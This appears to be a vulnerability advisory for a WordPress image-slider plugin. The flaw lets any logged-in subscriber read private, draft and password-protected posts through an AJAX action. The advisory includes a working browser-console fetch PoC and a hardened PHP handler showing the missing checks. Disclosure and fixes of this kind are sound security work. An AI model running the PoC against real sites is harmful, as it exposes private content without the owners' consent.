wpvulndb | Krzysztof Zając (CERT PL) | WPVDB-ID: 1AFC0E4A-F712-47D4-BF29-7719CCBBBB1B
History: Nov 23, 2023 - 12:00 a.m.

Slider - Ultimate Responsive Image Slider < 3.5.12 - Subscriber+ Arbitrary Post Access

2023-11-23 00:00:00
Krzysztof Zając (CERT PL)
wpscan.com
Tags: plugin, ajax action, authenticated users, private post, draft post, password protected, web browser, subscriber user, developer console, poc, command, content, vulnerability

AI Score: 6.7
Confidence: High
EPSS: 0.001
Percentile: 18.1%

Description: The plugin does not ensure that posts accessed via an AJAX action are slides, nor that they can be viewed by the user making the request. This allows any authenticated user, such as a subscriber, to read the content of arbitrary posts, including private, draft and password-protected ones.

PoC

Run the command below in the web browser's developer console while logged in to the blog as a subscriber user (4 being the ID of a private, draft or password-protected post):

```javascript
// POST to the plugin's AJAX action with the ID of a post the subscriber may not read
fetch("/wp-admin/admin-ajax.php?action=uris_get_thumbnail", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": "imageid=4",
  "method": "POST",
}).then((response) => { return response.text(); })
  .then((data) => { console.log(data); });
```

The content of the post will be displayed in the rpgp_image_desc textarea.
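From the defender's side, an added illustration (not the plugin's code, and not necessarily how version 3.5.12 fixed it) of the two checks the description says were missing from a handler like the one behind `uris_get_thumbnail`: restricting the lookup to the plugin's own slide post type, and verifying the requester may read that specific post. The function name, nonce action and `example_slide` post type are assumptions.

```php
<?php
// Added example of a hardened handler for the "uris_get_thumbnail" AJAX
// action. Function name, nonce action and post type are assumptions, not
// taken from the plugin; the checks are the point of the example.

add_action( 'wp_ajax_uris_get_thumbnail', 'example_uris_get_thumbnail_hardened' );

function example_uris_get_thumbnail_hardened() {
    // Require a nonce issued to this logged-in user (CSRF guard).
    check_ajax_referer( 'example_uris_nonce', 'nonce' );

    $post_id = isset( $_POST['imageid'] ) ? absint( $_POST['imageid'] ) : 0;
    $post    = $post_id ? get_post( $post_id ) : null;

    // Only the plugin's own slides may be returned, never arbitrary posts.
    if ( ! $post || 'example_slide' !== $post->post_type ) {
        wp_send_json_error( 'not a slide', 404 );
    }

    // The requester must be allowed to read this particular post. WordPress
    // maps read_post to read_private_posts for private posts and to
    // edit_post for drafts, so a subscriber fails both.
    if ( ! current_user_can( 'read_post', $post->ID ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // read_post does not cover post passwords; check them separately.
    if ( post_password_required( $post ) ) {
        wp_send_json_error( 'password required', 403 );
    }

    wp_send_json_success( array(
        'thumbnail' => get_the_post_thumbnail_url( $post, 'thumbnail' ),
        'desc'      => $post->post_content,
    ) );
}
```

With these checks in place the PoC request above for a private, draft or password-protected post ID returns an error instead of the post body.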
